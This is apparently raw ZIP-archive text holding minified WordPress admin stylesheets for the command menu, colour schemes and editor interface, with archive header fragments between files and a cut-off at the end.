(min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!N%%dist/commands/style.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.commands-command-menu{border-radius:4px;margin:auto;max-width:400px;position:relative;top:calc(5% + 64px);width:calc(100% - 32px)}@media (min-width:600px){.commands-command-menu{top:calc(10% + 64px)}}.commands-command-menu .components-modal__content{margin:0;padding:0}.commands-command-menu__overlay{align-items:start;display:block}.commands-command-menu__header{align-items:center;display:flex;padding:0 16px}.commands-command-menu__header .components-button{border:1px solid #949494;border-radius:2px 0 0 2px;border-right:0;height:56px;justify-content:center;width:56px}.commands-command-menu__header .components-button+[cmdk-input]{border-bottom-left-radius:0;border-top-left-radius:0}.commands-command-menu__header-search-icon:dir(ltr){transform:scaleX(-1)}.commands-command-menu__container{will-change:transform}.commands-command-menu__container [cmdk-input]{border:none;border-radius:0;color:#1e1e1e;font-size:15px;line-height:28px;margin:0;outline:none;padding:16px 4px;width:100%}.commands-command-menu__container [cmdk-input]::placeholder{color:#757575}.commands-command-menu__container [cmdk-input]:focus{box-shadow:none;outline:none}.commands-command-menu__container [cmdk-item]{align-items:center;border-radius:2px;color:#1e1e1e;cursor:pointer;display:flex;font-size:13px}.commands-command-menu__container [cmdk-item]:active,.commands-command-menu__container [cmdk-item][aria-selected=true]{background:var(--wp-admin-theme-color);color:#fff}.commands-command-menu__container [cmdk-item]:active svg,.commands-command-menu__container [cmdk-item][aria-selected=true] svg{fill:#fff}.commands-command-menu__container [cmdk-item][aria-disabled=true]{color:#949494;cursor:not-allowed}.commands-command-menu__container [cmdk-item] svg{fill:#1e1e1e}.commands-command-menu__container [cmdk-item]>div{min-height:40px;padding:4px 4px 4px 40px}.commands-command-menu__container [cmdk-item]>.has-icon{padding-left:8px}.commands-command-menu__container [cmdk-root]>[cmdk-list]{max-height:368px;overflow:auto}.commands-command-menu__container [cmdk-root]>[cmdk-list] [cmdk-list-sizer]>[cmdk-group]:last-child [cmdk-group-items]:not(:empty){padding-bottom:8px}.commands-command-menu__container [cmdk-root]>[cmdk-list] [cmdk-list-sizer]>[cmdk-group]>[cmdk-group-items]:not(:empty){padding:0 8px}.commands-command-menu__container [cmdk-empty]{align-items:center;color:#1e1e1e;display:flex;justify-content:center;padding:8px 0 32px;white-space:pre-wrap}.commands-command-menu__container [cmdk-loading]{padding:16px}.commands-command-menu__container [cmdk-list-sizer]{position:relative}.commands-command-menu__item span{display:inline-block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.commands-command-menu__item mark{background:unset;color:inherit;font-weight:600}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!{''dist/commands/style-rtl.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.commands-command-menu{border-radius:4px;margin:auto;max-width:400px;position:relative;top:calc(5% + 64px);width:calc(100% - 32px)}@media (min-width:600px){.commands-command-menu{top:calc(10% + 64px)}}.commands-command-menu .components-modal__content{margin:0;padding:0}.commands-command-menu__overlay{align-items:start;display:block}.commands-command-menu__header{align-items:center;display:flex;padding:0 16px}.commands-command-menu__header .components-button{border:1px solid #949494;border-left:0;border-radius:0 2px 2px 0;height:56px;justify-content:center;width:56px}.commands-command-menu__header .components-button+[cmdk-input]{border-bottom-right-radius:0;border-top-right-radius:0}.commands-command-menu__header-search-icon:dir(ltr){transform:scaleX(-1)}.commands-command-menu__container{will-change:transform}.commands-command-menu__container [cmdk-input]{border:none;border-radius:0;color:#1e1e1e;font-size:15px;line-height:28px;margin:0;outline:none;padding:16px 4px;width:100%}.commands-command-menu__container [cmdk-input]::placeholder{color:#757575}.commands-command-menu__container [cmdk-input]:focus{box-shadow:none;outline:none}.commands-command-menu__container [cmdk-item]{align-items:center;border-radius:2px;color:#1e1e1e;cursor:pointer;display:flex;font-size:13px}.commands-command-menu__container [cmdk-item]:active,.commands-command-menu__container [cmdk-item][aria-selected=true]{background:var(--wp-admin-theme-color);color:#fff}.commands-command-menu__container [cmdk-item]:active svg,.commands-command-menu__container [cmdk-item][aria-selected=true] svg{fill:#fff}.commands-command-menu__container [cmdk-item][aria-disabled=true]{color:#949494;cursor:not-allowed}.commands-command-menu__container [cmdk-item] svg{fill:#1e1e1e}.commands-command-menu__container [cmdk-item]>div{min-height:40px;padding:4px 40px 4px 4px}.commands-command-menu__container [cmdk-item]>.has-icon{padding-right:8px}.commands-command-menu__container [cmdk-root]>[cmdk-list]{max-height:368px;overflow:auto}.commands-command-menu__container [cmdk-root]>[cmdk-list] [cmdk-list-sizer]>[cmdk-group]:last-child [cmdk-group-items]:not(:empty){padding-bottom:8px}.commands-command-menu__container [cmdk-root]>[cmdk-list] [cmdk-list-sizer]>[cmdk-group]>[cmdk-group-items]:not(:empty){padding:0 8px}.commands-command-menu__container [cmdk-empty]{align-items:center;color:#1e1e1e;display:flex;justify-content:center;padding:8px 0 32px;white-space:pre-wrap}.commands-command-menu__container [cmdk-loading]{padding:16px}.commands-command-menu__container [cmdk-list-sizer]{position:relative}.commands-command-menu__item span{display:inline-block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.commands-command-menu__item mark{background:unset;color:inherit;font-weight:600}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!Wdist/editor/style-rtl.min.cssnuȯ@charset "UTF-8";:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.interface-complementary-area-header{background:#fff;gap:4px;padding-left:8px}.interface-complementary-area-header .interface-complementary-area-header__title{margin:0 0 0 auto}.interface-complementary-area{background:#fff;color:#1e1e1e;height:100%;overflow:auto}@media (min-width:600px){.interface-complementary-area{-webkit-overflow-scrolling:touch}}@media (min-width:782px){.interface-complementary-area{width:280px}}.interface-complementary-area .components-panel{border:none;position:relative;z-index:0}.interface-complementary-area .components-panel__header{position:sticky;top:0;z-index:1}.interface-complementary-area .components-panel__header.editor-sidebar__panel-tabs{top:0}.interface-complementary-area p:not(.components-base-control__help,.components-form-token-field__help){margin-top:0}.interface-complementary-area h2{color:#1e1e1e;font-size:13px;font-weight:500;margin-bottom:1.5em}.interface-complementary-area h3{color:#1e1e1e;font-size:11px;font-weight:500;margin-bottom:1.5em;text-transform:uppercase}.interface-complementary-area hr{border-bottom:1px solid #f0f0f0;border-top:none;margin:1.5em 0}.interface-complementary-area div.components-toolbar,.interface-complementary-area div.components-toolbar-group{box-shadow:none;margin-bottom:1.5em}.interface-complementary-area div.components-toolbar-group:last-child,.interface-complementary-area div.components-toolbar:last-child{margin-bottom:0}.interface-complementary-area .block-editor-skip-to-selected-block:focus{bottom:10px;left:10px;right:auto;top:auto}.interface-complementary-area__fill{height:100%}@media (min-width:782px){body.js.is-fullscreen-mode{height:calc(100% + 32px);margin-top:-32px}body.js.is-fullscreen-mode #adminmenumain,body.js.is-fullscreen-mode #wpadminbar{display:none}body.js.is-fullscreen-mode #wpcontent,body.js.is-fullscreen-mode #wpfooter{margin-right:0}}html.interface-interface-skeleton__html-container{position:fixed;width:100%}@media (min-width:782px){html.interface-interface-skeleton__html-container:not(:has(.is-zoom-out)){position:static;width:auto}}.interface-interface-skeleton{bottom:0;display:flex;flex-direction:row;height:auto;left:0;max-height:100%;position:fixed;top:46px}@media (min-width:783px){.interface-interface-skeleton{top:32px}.is-fullscreen-mode .interface-interface-skeleton{top:0}}.interface-interface-skeleton__editor{display:flex;flex:0 1 100%;flex-direction:column;overflow:hidden}.interface-interface-skeleton{right:0}@media (min-width:783px){.interface-interface-skeleton{right:160px}}@media (min-width:783px){.auto-fold .interface-interface-skeleton{right:36px}}@media (min-width:961px){.auto-fold .interface-interface-skeleton{right:160px}}.folded .interface-interface-skeleton{right:0}@media (min-width:783px){.folded .interface-interface-skeleton{right:36px}}body.is-fullscreen-mode .interface-interface-skeleton{right:0!important}.interface-interface-skeleton__body{display:flex;flex-grow:1;overflow:auto;overscroll-behavior-y:none;position:relative}@media (min-width:782px){.has-footer .interface-interface-skeleton__body{padding-bottom:25px}}.interface-interface-skeleton__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto;z-index:20}@media (min-width:782px){.interface-interface-skeleton__content{z-index:auto}}.interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{background:#fff;bottom:0;color:#1e1e1e;flex-shrink:0;position:absolute;right:0;top:0;width:auto;z-index:100000}@media (min-width:782px){.interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{position:relative!important}}.interface-interface-skeleton__sidebar{border-top:1px solid #e0e0e0;overflow:hidden}@media (min-width:782px){.interface-interface-skeleton__sidebar{box-shadow:1px 0 0 0 rgba(0,0,0,.133);outline:1px solid #0000}}.interface-interface-skeleton__secondary-sidebar{border-top:1px solid #e0e0e0;left:0}@media (min-width:782px){.interface-interface-skeleton__secondary-sidebar{box-shadow:-1px 0 0 0 rgba(0,0,0,.133);outline:1px solid #0000}}.interface-interface-skeleton__header{box-shadow:0 1px 0 0 rgba(0,0,0,.133);color:#1e1e1e;flex-shrink:0;height:auto;outline:1px solid #0000;z-index:30}.interface-interface-skeleton__footer{background-color:#fff;border-top:1px solid #e0e0e0;bottom:0;color:#1e1e1e;display:none;flex-shrink:0;height:auto;position:absolute;right:0;width:100%;z-index:90}@media (min-width:782px){.interface-interface-skeleton__footer{display:flex}}.interface-interface-skeleton__footer .block-editor-block-breadcrumb{align-items:center;background:#fff;display:flex;font-size:13px;height:24px;padding:0 18px;z-index:30}.interface-interface-skeleton__actions{background:#fff;bottom:auto;color:#1e1e1e;left:0;position:fixed!important;right:auto;top:-9999em;width:100vw;z-index:100000}@media (min-width:782px){.interface-interface-skeleton__actions{width:280px}}.interface-interface-skeleton__actions:focus,.interface-interface-skeleton__actions:focus-within{bottom:0;top:auto}.is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{top:46px}@media (min-width:782px){.is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{border-right:1px solid #ddd;top:32px}.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{top:0}}.interface-pinned-items{display:flex}.interface-pinned-items .components-button{display:none;margin:0}.interface-pinned-items .components-button[aria-controls="edit-post:block"],.interface-pinned-items .components-button[aria-controls="edit-post:document"],.interface-pinned-items .components-button[aria-controls="edit-site:block-inspector"],.interface-pinned-items .components-button[aria-controls="edit-site:template"]{display:flex}.interface-pinned-items .components-button svg{max-height:24px;max-width:24px}@media (min-width:600px){.interface-pinned-items .components-button{display:flex}}.interface-pinned-items{gap:8px}.editor-autocompleters__user .editor-autocompleters__no-avatar:before{content:"\f110";font:normal 20px/1 dashicons;margin-left:5px;vertical-align:middle}.editor-autocompleters__user .editor-autocompleters__user-avatar{flex-grow:0;flex-shrink:0;height:24px;margin-left:8px;max-width:none;width:24px}.editor-autocompleters__user .editor-autocompleters__user-name{flex-grow:1;flex-shrink:0;max-width:200px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-autocompleters__user .editor-autocompleters__user-slug{flex-grow:0;flex-shrink:0;margin-right:8px;max-width:100px;overflow:none;text-overflow:ellipsis;white-space:nowrap}.editor-autocompleters__user:not(.is-primary) .editor-autocompleters__user-slug{color:#757575}.interface-interface-skeleton__sidebar:has(.editor-collab-sidebar){box-shadow:none}.interface-interface-skeleton__sidebar:has(.editor-collab-sidebar) .interface-complementary-area-header{display:none}.editor-collab-sidebar{height:100%;overflow:hidden}.editor-collab-sidebar-panel{height:100%;overflow:hidden;padding:16px 16px 24px}.editor-collab-sidebar-panel__thread{background-color:#f0f0f0;border:1px solid #ddd;border-radius:8px;overflow:hidden;padding:16px;position:relative;width:auto}.editor-collab-sidebar-panel__thread.is-selected{background-color:#fff;box-shadow:0 2px 3px #0000000d,0 4px 5px #0000000a,0 12px 12px #00000008,0 16px 16px #00000005;z-index:1}.editor-collab-sidebar-panel__thread:focus{outline:var(--wp-admin-border-width-focus) solid var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-1)}.editor-collab-sidebar-panel__thread.is-floating{left:16px;margin-top:16px;position:absolute;right:16px}.editor-collab-sidebar-panel__user-name{text-transform:capitalize}.editor-collab-sidebar-panel__user-name,.editor-collab-sidebar-panel__user-time{color:#757575;font-size:12px;font-weight:400;line-height:16px;text-align:right}.editor-collab-sidebar-panel__user-comment p:last-child{margin-bottom:0}.editor-collab-sidebar-panel__user-avatar{background:#fff;border-radius:50%;border-style:solid;border-width:var(--wp-admin-border-width-focus);flex-shrink:0;padding:var(--wp-admin-border-width-focus)}.editor-collab-sidebar-panel__comment-status{margin-right:auto}.editor-collab-sidebar-panel__comment-status button.has-icon:not(.has-text){flex-shrink:0;height:24px;min-width:24px;padding:0;width:24px}.editor-collab-sidebar-panel__comment-dropdown-menu{flex-shrink:0}.editor-collab-sidebar-panel__more-reply-separator:after,.editor-collab-sidebar-panel__more-reply-separator:before{background-color:#ddd;content:"";display:block;flex:1;height:1px;width:100%}.editor-collab-sidebar-panel__more-reply-button{font-weight:500}.editor-collab-sidebar-panel__resolution-text{font-style:italic}.editor-collab-sidebar-panel__comment-form textarea{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.editor-collab-sidebar-panel__comment-form textarea{transition:box-shadow .1s linear}}@media (min-width:600px){.editor-collab-sidebar-panel__comment-form textarea{font-size:13px;line-height:normal}}.editor-collab-sidebar-panel__comment-form textarea:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color);outline:2px solid #0000}.editor-collab-sidebar-panel__comment-form textarea::-webkit-input-placeholder{color:#1e1e1e9e}.editor-collab-sidebar-panel__comment-form textarea::-moz-placeholder{color:#1e1e1e9e}.editor-collab-sidebar-panel__comment-form textarea:-ms-input-placeholder{color:#1e1e1e9e}.editor-collab-sidebar-panel__comment-form textarea{display:block;line-height:20px!important;padding:9px 11px}.editor-collab-sidebar-panel__skip-to-block,.editor-collab-sidebar-panel__skip-to-comment{background:#fff!important;clip-path:inset(50%);left:-9999px;overflow:hidden;position:absolute;top:-9999px;z-index:-1}.editor-collab-sidebar-panel__skip-to-block:focus,.editor-collab-sidebar-panel__skip-to-comment:focus{clip-path:none;left:8px;overflow:visible;z-index:1}.editor-collab-sidebar-panel__skip-to-comment:focus{top:8px}.editor-collab-sidebar-panel__skip-to-block:focus{bottom:8px;top:auto}.comment-avatar{background:#fff;border-radius:50%;border-style:solid;border-width:var(--wp-admin-border-width-focus);box-sizing:border-box;margin-right:-12px;padding:var(--wp-admin-border-width-focus);width:24px}.comment-avatar:first-child{margin-right:0}.show-icon-labels .comment-avatar-indicator{width:auto}.show-icon-labels .comment-avatar-indicator div{display:none}.show-icon-labels .comment-avatar-indicator:after{content:attr(aria-label);font-size:12px}.editor-collapsible-block-toolbar{align-items:center;display:flex;height:64px;overflow:hidden}.editor-collapsible-block-toolbar .block-editor-block-contextual-toolbar{background:#0000;border-bottom:0;height:100%}.editor-collapsible-block-toolbar .block-editor-block-toolbar{height:100%;padding-top:17px}.editor-collapsible-block-toolbar .block-editor-block-toolbar .components-button:not(.block-editor-block-mover-button){height:32px}.editor-collapsible-block-toolbar:after{background-color:#ddd;content:"";height:24px;margin-left:7px;width:1px}.editor-collapsible-block-toolbar .components-toolbar,.editor-collapsible-block-toolbar .components-toolbar-group{border-left:none;position:relative}.editor-collapsible-block-toolbar .components-toolbar-group:after,.editor-collapsible-block-toolbar .components-toolbar:after{background-color:#ddd;content:"";height:24px;left:-1px;position:absolute;top:4px;width:1px}.editor-collapsible-block-toolbar .components-toolbar .components-toolbar-group.components-toolbar-group:after,.editor-collapsible-block-toolbar .components-toolbar-group .components-toolbar-group.components-toolbar-group:after{display:none}.editor-collapsible-block-toolbar .block-editor-block-mover.is-horizontal .block-editor-block-mover-button{height:32px;overflow:visible}@media (min-width:600px){.editor-collapsible-block-toolbar .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{height:40px;position:relative;top:-4px}}.editor-collapsible-block-toolbar.is-collapsed{display:none}.editor-content-only-settings-menu__description{min-width:235px;padding:8px}.editor-block-visibility__disabled-blocks-count{background-color:#fff;border:1px solid #ddd;border-width:1px 0;box-shadow:32px 0 0 0 #fff,-32px 0 0 0 #fff;padding:8px;position:sticky;text-align:center;top:-5px;z-index:2}.editor-block-visibility__disabled-blocks-count~.block-editor-block-manager__content .block-editor-block-manager__category-title{top:31px}.editor-block-visibility__disabled-blocks-count .is-link{margin-right:12px}.editor-blog-title-dropdown__content .components-popover__content{min-width:320px;padding:16px}.editor-document-bar{align-items:center;background:#f0f0f0;border-radius:4px;display:flex;height:32px;justify-content:space-between;min-width:0;width:min(100%,450px)}.editor-document-bar:hover{background-color:#e0e0e0}.editor-document-bar .components-button{border-radius:4px}@media not (prefers-reduced-motion){.editor-document-bar .components-button{transition:all .1s ease-out}}.editor-document-bar .components-button:hover{background:#e0e0e0}@media screen and (min-width:782px) and (max-width:960px){.editor-document-bar.has-back-button .editor-document-bar__post-type-label{display:none}}.editor-document-bar__command{color:var(--wp-block-synced-color);flex-grow:1;overflow:hidden}.editor-document-bar__title{color:#1e1e1e;margin:0 auto;max-width:70%;overflow:hidden}@media (min-width:782px){.editor-document-bar__title{padding-right:24px}}.editor-document-bar__title h1{align-items:center;display:flex;font-weight:400;justify-content:center;overflow:hidden;white-space:nowrap}.editor-document-bar__post-title{color:currentColor;flex:1;overflow:hidden;text-overflow:ellipsis}.editor-document-bar__post-type-label{color:#2f2f2f;flex:0;padding-right:4px}@media screen and (max-width:600px){.editor-document-bar__post-type-label{display:none}}.editor-document-bar__shortcut{color:#2f2f2f;display:none;min-width:24px}@media 